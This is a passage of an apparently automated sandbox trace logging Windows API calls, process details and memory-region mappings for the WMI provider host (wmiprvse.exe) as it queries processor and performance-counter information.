BaseAddress=0x58a850) returned 1 [0178.653] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x78) returned 0x58a850 [0178.653] SafeArrayGetDim (psa=0x571530) returned 0x1 [0178.653] SafeArrayGetLBound (in: psa=0x571530, nDim=0x1, plLbound=0xedd300 | out: plLbound=0xedd300) returned 0x0 [0178.653] SafeArrayGetUBound (in: psa=0x571530, nDim=0x1, plUbound=0xedd320 | out: plUbound=0xedd320) returned 0x0 [0178.653] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28) returned 0x11e40f0 [0178.653] SafeArrayGetDim (psa=0x571530) returned 0x1 [0178.653] SafeArrayGetUBound (in: psa=0x571530, nDim=0x1, plUbound=0xedd2c8 | out: plUbound=0xedd2c8) returned 0x0 [0178.653] SafeArrayGetElemsize (psa=0x571530) returned 0x8 [0178.654] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x11e40f0) returned 1 [0178.654] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x58a850) returned 1 [0178.656] LoadLibraryExW (lpLibFileName="iphlpapi.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffa0baf0000 [0178.656] GetProcAddress (hModule=0x7ffa0baf0000, lpProcName="GetAdapterIndex") returned 0x7ffa0bb0ddb0 [0178.657] GetAdapterIndex (in: AdapterName="\\DEVICE\\TCPIP_{E96D977E-F067-4CE9-924D-F6E0A04729E4}", IfIndex=0xedd980 | out: IfIndex=0xedd980) returned 0x0 [0178.657] FreeLibrary (hLibModule=0x7ffa0baf0000) returned 1 [0178.658] free (_Block=0xd61dc0) [0178.659] free (_Block=0xd61690) [0178.660] free (_Block=0xd61a00) [0178.660] free (_Block=0xd61b90) [0178.661] free (_Block=0xd61aa0) [0178.661] free (_Block=0xd67430) [0178.662] free (_Block=0xd67460) [0178.662] free (_Block=0xd66f50) [0178.663] free (_Block=0xd600a0) [0178.663] free (_Block=0xd66f80) [0178.664] free (_Block=0xd670d0) [0178.665] free (_Block=0xd603b0) [0178.665] free (_Block=0xd60500) [0178.665] free (_Block=0xd67310) [0178.666] free (_Block=0xd674c0) [0178.667] free (_Block=0xd674f0) [0178.669] free (_Block=0xd87c20) [0178.759] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x4) returned 0x1222f90 [0178.759] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x1222f90, pulNumLanguages=0xede1c0 | out: pulNumLanguages=0xede1c0) returned 1 [0178.759] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x1222f90) returned 1 [0178.759] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x1223110) returned 1 [0184.465] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2 [0184.634] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2 [0184.720] RtlRestoreLastWin32Error () returned 0x352000 [0184.720] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xede118, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xede010 | out: pulNumLanguages=0xede118, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xede010) returned 1 [0184.720] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x12230a0 [0184.720] RtlRestoreLastWin32Error () returned 0x352000 [0184.720] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xede118, pwszLanguagesBuffer=0x12230a0, pcchLanguagesBuffer=0xede010 | out: pulNumLanguages=0xede118, pwszLanguagesBuffer=0x12230a0, pcchLanguagesBuffer=0xede010) returned 1 [0184.720] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x1223030 [0184.720] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x12230a0) returned 1 [0184.720] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x514870 [0184.720] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x514870, pulNumLanguages=0xede118 | out: pulNumLanguages=0xede118) returned 1 [0184.720] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x514870) returned 1 [0184.724] malloc (_Size=0x600) returned 0xd66510 [0184.724] GetLogicalProcessorInformationEx (in: RelationshipType=0xffff, Buffer=0x0, ReturnedLength=0xedd7f8 | out: Buffer=0x0, ReturnedLength=0xedd7f8) returned 0 [0184.724] GetLastError () returned 0x7a [0184.724] malloc (_Size=0x250) returned 0xd67530 [0184.724] GetLogicalProcessorInformationEx (in: RelationshipType=0xffff, Buffer=0xd67530, ReturnedLength=0xedd7f8 | out: Buffer=0xd67530, ReturnedLength=0xedd7f8) returned 1 [0184.724] GetActiveProcessorCount (GroupNumber=0xffff) returned 0x4 [0184.724] GetMaximumProcessorGroupCount () returned 0x1 [0184.724] malloc (_Size=0x40) returned 0xd61960 [0184.725] malloc (_Size=0x40) returned 0xd619b0 [0184.725] malloc (_Size=0x8) returned 0xd659d0 [0184.725] memcpy (in: _Dst=0xd61960, _Src=0xd67550, _Size=0x10 | out: _Dst=0xd61960) returned 0xd61960 [0184.725] GetActiveProcessorCount (GroupNumber=0x0) returned 0x4 [0184.725] NtPowerInformation (in: InformationLevel=0x2e, InputBuffer=0xedd7f0, InputBufferLength=0x2, OutputBuffer=0xd66510, OutputBufferLength=0x60 | out: OutputBuffer=0xd66510) returned 0x0 [0184.725] _vsnwprintf (in: _Buffer=0xedd690, _BufferCount=0x63, _Format="CPU%d", _ArgList=0xedcf88 | out: _Buffer="CPU0") returned 4 [0184.726] GetCurrentThread () returned 0xfffffffffffffffe [0184.726] SetThreadGroupAffinity (in: hThread=0xfffffffffffffffe, GroupAffinity=0xedcee0, PreviousGroupAffinity=0xedcef0 | out: PreviousGroupAffinity=0xedcef0) returned 1 [0184.726] GetSystemInfo (in: lpSystemInfo=0xedd020 | out: lpSystemInfo=0xedd020*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0184.726] mbstowcs (in: _Dest=0xedd2a8, _Source="GenuineIntel", _MaxCount=0x28 | out: _Dest="GenuineIntel") returned 0xc [0184.726] _wcsicmp (_String1="GenuineIntel", _String2="GenuineIntel") returned 0 [0184.727] mbstowcs (in: _Dest=0xedd118, _Source="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz", _MaxCount=0x28 | out: _Dest="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x27 [0184.727] GetCurrentThread () returned 0xfffffffffffffffe [0184.727] SetThreadGroupAffinity (in: hThread=0xfffffffffffffffe, GroupAffinity=0xedcef0, PreviousGroupAffinity=0x0 | out: PreviousGroupAffinity=0x0) returned 1 [0184.731] LoadStringW (in: hInstance=0x7ff9fc2b0000, uID=0x2c, lpBuffer=0xedccf0, cchBufferMax=256 | out: lpBuffer="CPU %d") returned 0x6 [0184.789] malloc (_Size=0x35140) returned 0xd87d50 [0184.797] _wtoi (_String="238") returned 238 [0184.797] _wtoi (_String="6") returned 6 [0184.797] _itow (in: _Dest=0x0, _Radix=15586752 | out: _Dest=0x0) returned="0" [0184.797] _itow (in: _Dest=0xee, _Radix=15585040 | out: _Dest=0xee) returned="238" [0184.797] malloc (_Size=0x4000) returned 0xdbcea0 [0184.797] RegQueryValueExW (in: hKey=0xffffffff80000004, lpValueName="238", lpReserved=0x0, lpType=0x0, lpData=0xdbcea0, lpcbData=0xedcee4*=0x4000 | out: lpType=0x0, lpData=0xdbcea0*=0x50, lpcbData=0xedcee4*=0x600) returned 0x0 [0184.799] free (_Block=0xdbcea0) [0184.800] Sleep (dwMilliseconds=0x3e8) [0185.809] _itow (in: _Dest=0xee, _Radix=15585040 | out: _Dest=0xee) returned="238" [0185.809] malloc (_Size=0x4000) returned 0xdbcea0 [0185.809] RegQueryValueExW (in: hKey=0xffffffff80000004, lpValueName="238", lpReserved=0x0, lpType=0x0, lpData=0xdbcea0, lpcbData=0xedcee4*=0x4000 | out: lpType=0x0, lpData=0xdbcea0*=0x50, lpcbData=0xedcee4*=0x600) returned 0x0 [0185.810] free (_Block=0xdbcea0) [0185.813] free (_Block=0xd87d50) [0185.826] _vsnwprintf (in: _Buffer=0xedd5c0, _BufferCount=0x40, _Format="%04X%04X%04X%04X", _ArgList=0xedcf88 | out: _Buffer="0F8BFBFF00050654") returned 16 [0185.828] lstrlenW (lpString=" 0") returned 2 [0185.829] lstrlenW (lpString="Intel(R) Xeon(R) Gold 6126 CPU @ 2.60GHz") returned 40 [0185.829] lstrlenW (lpString="") returned 0 [0185.830] lstrlenW (lpString="") returned 0 [0185.830] lstrlenW (lpString="") returned 0 [0185.840] IsProcessorFeaturePresent (ProcessorFeature=0x14) returned 1 [0185.841] IsProcessorFeaturePresent (ProcessorFeature=0x15) returned 1 [0185.842] RtlNumberOfSetBitsUlongPtr (Target=0x1) returned 0x1 [0185.842] RtlNumberOfSetBitsUlongPtr (Target=0x2) returned 0x1 [0185.842] RtlNumberOfSetBitsUlongPtr (Target=0x4) returned 0x1 [0185.842] RtlNumberOfSetBitsUlongPtr (Target=0x8) returned 0x1 [0185.842] _vsnwprintf (in: _Buffer=0xedd880, _BufferCount=0x63, _Format="CPU%d", _ArgList=0xedd7c8 | out: _Buffer="CPU0") returned 4 [0185.843] free (_Block=0xd659d0) [0185.844] free (_Block=0xd619b0) [0185.844] free (_Block=0xd61960) [0185.844] free (_Block=0xd67530) [0185.847] free (_Block=0xd66510) [0185.872] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x4) returned 0x1222e40 [0185.872] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x1222e40, pulNumLanguages=0xede1c0 | out: pulNumLanguages=0xede1c0) returned 1 [0185.872] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x1222e40) returned 1 [0185.872] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x1223030) returned 1 [0186.718] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2 [0186.796] RtlRestoreLastWin32Error () returned 0x352000 [0186.796] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xede118, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xede010 | out: pulNumLanguages=0xede118, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xede010) returned 1 [0186.796] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x1222e60 [0186.796] RtlRestoreLastWin32Error () returned 0x352000 [0186.796] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xede118, pwszLanguagesBuffer=0x1222e60, pcchLanguagesBuffer=0xede010 | out: pulNumLanguages=0xede118, pwszLanguagesBuffer=0x1222e60, pcchLanguagesBuffer=0xede010) returned 1 [0186.796] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x1222e50 [0186.796] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x1222e60) returned 1 [0186.796] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x514830 [0186.796] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x514830, pulNumLanguages=0xede118 | out: pulNumLanguages=0xede118) returned 1 [0186.796] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x514830) returned 1 [0186.798] malloc (_Size=0x600) returned 0xd66510 [0186.798] GetLogicalProcessorInformationEx (in: RelationshipType=0xffff, Buffer=0x0, ReturnedLength=0xedd7f8 | out: Buffer=0x0, ReturnedLength=0xedd7f8) returned 0 [0186.798] GetLastError () returned 0x7a [0186.798] malloc (_Size=0x250) returned 0xd67530 [0186.799] GetLogicalProcessorInformationEx (in: RelationshipType=0xffff, Buffer=0xd67530, ReturnedLength=0xedd7f8 | out: Buffer=0xd67530, ReturnedLength=0xedd7f8) returned 1 [0186.799] GetActiveProcessorCount (GroupNumber=0xffff) returned 0x4 [0186.799] GetMaximumProcessorGroupCount () returned 0x1 [0186.799] malloc (_Size=0x40) returned 0xd618c0 [0186.799] malloc (_Size=0x40) returned 0xd61d70 [0186.799] malloc (_Size=0x8) returned 0xd659d0 [0186.799] memcpy (in: _Dst=0xd618c0, _Src=0xd67550, _Size=0x10 | out: _Dst=0xd618c0) returned 0xd618c0 [0186.799] GetActiveProcessorCount (GroupNumber=0x0) returned 0x4 [0186.799] NtPowerInformation (in: InformationLevel=0x2e, InputBuffer=0xedd7f0, InputBufferLength=0x2, OutputBuffer=0xd66510, OutputBufferLength=0x60 | out: OutputBuffer=0xd66510) returned 0x0 [0186.799] _vsnwprintf (in: _Buffer=0xedd690, _BufferCount=0x63, _Format="CPU%d", _ArgList=0xedcf88 | out: _Buffer="CPU0") returned 4 [0186.800] GetCurrentThread () returned 0xfffffffffffffffe [0186.800] SetThreadGroupAffinity (in: hThread=0xfffffffffffffffe, GroupAffinity=0xedcee0, PreviousGroupAffinity=0xedcef0 | out: PreviousGroupAffinity=0xedcef0) returned 1 [0186.800] GetSystemInfo (in: lpSystemInfo=0xedd020 | out: lpSystemInfo=0xedd020*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0186.800] mbstowcs (in: _Dest=0xedd2a8, _Source="GenuineIntel", _MaxCount=0x28 | out: _Dest="GenuineIntel") returned 0xc [0186.800] _wcsicmp (_String1="GenuineIntel", _String2="GenuineIntel") returned 0 [0186.801] mbstowcs (in: _Dest=0xedd118, _Source="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz", _MaxCount=0x28 | out: _Dest="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x27 [0186.801] GetCurrentThread () returned 0xfffffffffffffffe [0186.801] SetThreadGroupAffinity (in: hThread=0xfffffffffffffffe, GroupAffinity=0xedcef0, PreviousGroupAffinity=0x0 | out: PreviousGroupAffinity=0x0) returned 1 [0186.805] LoadStringW (in: hInstance=0x7ff9fc2b0000, uID=0x2c, lpBuffer=0xedccf0, cchBufferMax=256 | out: lpBuffer="CPU %d") returned 0x6 [0186.851] malloc (_Size=0x35140) returned 0xd87d50 [0186.862] _wtoi (_String="238") returned 238 [0186.862] _wtoi (_String="6") returned 6 [0186.862] _itow (in: _Dest=0x0, _Radix=15586752 | out: _Dest=0x0) returned="0" [0186.862] _itow (in: _Dest=0xee, _Radix=15585040 | out: _Dest=0xee) returned="238" [0186.862] malloc (_Size=0x4000) returned 0xdbcea0 [0186.862] RegQueryValueExW (in: hKey=0xffffffff80000004, lpValueName="238", lpReserved=0x0, lpType=0x0, lpData=0xdbcea0, lpcbData=0xedcee4*=0x4000 | out: lpType=0x0, lpData=0xdbcea0*=0x50, lpcbData=0xedcee4*=0x600) returned 0x0 [0186.863] free (_Block=0xdbcea0) [0186.864] Sleep (dwMilliseconds=0x3e8) [0187.865] _itow (in: _Dest=0xee, _Radix=15585040 | out: _Dest=0xee) returned="238" [0187.865] malloc (_Size=0x4000) returned 0xdbcea0 [0187.865] RegQueryValueExW (in: hKey=0xffffffff80000004, lpValueName="238", lpReserved=0x0, lpType=0x0, lpData=0xdbcea0, lpcbData=0xedcee4*=0x4000 | out: lpType=0x0, lpData=0xdbcea0*=0x50, lpcbData=0xedcee4*=0x600) returned 0x0 [0187.866] free (_Block=0xdbcea0) [0187.869] free (_Block=0xd87d50) [0187.875] _vsnwprintf (in: _Buffer=0xedd5c0, _BufferCount=0x40, _Format="%04X%04X%04X%04X", _ArgList=0xedcf88 | out: _Buffer="0F8BFBFF00050654") returned 16 [0187.876] lstrlenW (lpString=" 0") returned 2 [0187.877] lstrlenW (lpString="Intel(R) Xeon(R) Gold 6126 CPU @ 2.60GHz") returned 40 [0187.878] lstrlenW (lpString="") returned 0 [0187.878] lstrlenW (lpString="") returned 0 [0187.878] lstrlenW (lpString="") returned 0 [0187.881] IsProcessorFeaturePresent (ProcessorFeature=0x14) returned 1 [0187.882] IsProcessorFeaturePresent (ProcessorFeature=0x15) returned 1 [0187.883] RtlNumberOfSetBitsUlongPtr (Target=0x1) returned 0x1 [0187.883] RtlNumberOfSetBitsUlongPtr (Target=0x2) returned 0x1 [0187.883] RtlNumberOfSetBitsUlongPtr (Target=0x4) returned 0x1 [0187.883] RtlNumberOfSetBitsUlongPtr (Target=0x8) returned 0x1 [0187.883] _vsnwprintf (in: _Buffer=0xedd880, _BufferCount=0x63, _Format="CPU%d", _ArgList=0xedd7c8 | out: _Buffer="CPU0") returned 4 [0187.885] free (_Block=0xd659d0) [0187.885] free (_Block=0xd61d70) [0187.885] free (_Block=0xd618c0) [0187.886] free (_Block=0xd67530) [0187.888] free (_Block=0xd66510) [0187.901] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x4) returned 0x1223170 [0187.901] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x1223170, pulNumLanguages=0xede1c0 | out: pulNumLanguages=0xede1c0) returned 1 [0187.901] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x1223170) returned 1 [0187.902] RtlFreeHeap (HeapHandle=0x4a0000, Flags=0x0, BaseAddress=0x1222e50) returned 1 Thread: id = 152 os_tid = 0x1088 Thread: id = 153 os_tid = 0x1080 Thread: id = 170 os_tid = 0x1108 Process: id = "7" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x56a6b000" os_pid = "0x664" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x274" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000abff" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1957 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1958 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1959 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1960 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1961 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1962 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1963 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1964 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1965 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1966 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1967 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1968 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1969 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1970 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1971 start_va = 0x490000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 1972 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1973 start_va = 0x520000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 1974 start_va = 0x620000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1975 start_va = 0x6e0000 end_va = 0x6e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 1976 start_va = 0x760000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 1977 start_va = 0x770000 end_va = 0xaa6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1978 start_va = 0xab0000 end_va = 0xc37fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 1979 start_va = 0xc40000 end_va = 0xdc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c40000" filename = "" Region: id = 1980 start_va = 0xdd0000 end_va = 0xecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 1981 start_va = 0xed0000 end_va = 0xf4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ed0000" filename = "" Region: id = 1982 start_va = 0xf50000 end_va = 0xfcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 1983 start_va = 0xfd0000 end_va = 0x104ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 1984 start_va = 0x1050000 end_va = 0x10cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 1985 start_va = 0x10d0000 end_va = 0x114ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 1986 start_va = 0x1150000 end_va = 0x11cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 1987 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1988 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1989 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1990 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1991 start_va = 0x7ff7aedf0000 end_va = 0x7ff7aee6ffff monitored = 0 entry_point = 0x7ff7aee05f50 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 1992 start_va = 0x7ff9fc260000 end_va = 0x7ff9fc2acfff monitored = 0 entry_point = 0x7ff9fc26b470 region_type = mapped_file name = "pdh.dll" filename = "\\Windows\\System32\\pdh.dll" (normalized: "c:\\windows\\system32\\pdh.dll") Region: id = 1993 start_va = 0x7ff9fe1a0000 end_va = 0x7ff9fe1c4fff monitored = 1 entry_point = 0x7ff9fe1b5dc0 region_type = mapped_file name = "wmiperfclass.dll" filename = "\\Windows\\System32\\wbem\\WmiPerfClass.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiperfclass.dll") Region: id = 1994 start_va = 0x7ff9fe220000 end_va = 0x7ff9fe25cfff monitored = 1 entry_point = 0x7ff9fe22b760 region_type = mapped_file name = "wmiprov.dll" filename = "\\Windows\\System32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll") Region: id = 1995 start_va = 0x7ffa07ad0000 end_va = 0x7ffa07ae5fff monitored = 0 entry_point = 0x7ffa07ad55e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1996 start_va = 0x7ffa07c90000 end_va = 0x7ffa07cb4fff monitored = 0 entry_point = 0x7ffa07c99900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1997 start_va = 0x7ffa07cc0000 end_va = 0x7ffa07cd3fff monitored = 0 entry_point = 0x7ffa07cc1800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1998 start_va = 0x7ffa07ce0000 end_va = 0x7ffa07dd5fff monitored = 0 entry_point = 0x7ffa07d19590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1999 start_va = 0x7ffa08390000 end_va = 0x7ffa083a0fff monitored = 0 entry_point = 0x7ffa08392fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2000 start_va = 0x7ffa09490000 end_va = 0x7ffa0950efff monitored = 1 entry_point = 0x7ffa094a7110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2001 start_va = 0x7ffa0e8a0000 end_va = 0x7ffa0e903fff monitored = 0 entry_point = 0x7ffa0e8b5ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2002 start_va = 0x7ffa0f3e0000 end_va = 0x7ffa0f3f0fff monitored = 0 entry_point = 0x7ffa0f3e3320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 2003 start_va = 0x7ffa12280000 end_va = 0x7ffa122b0fff monitored = 0 entry_point = 0x7ffa12287d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: 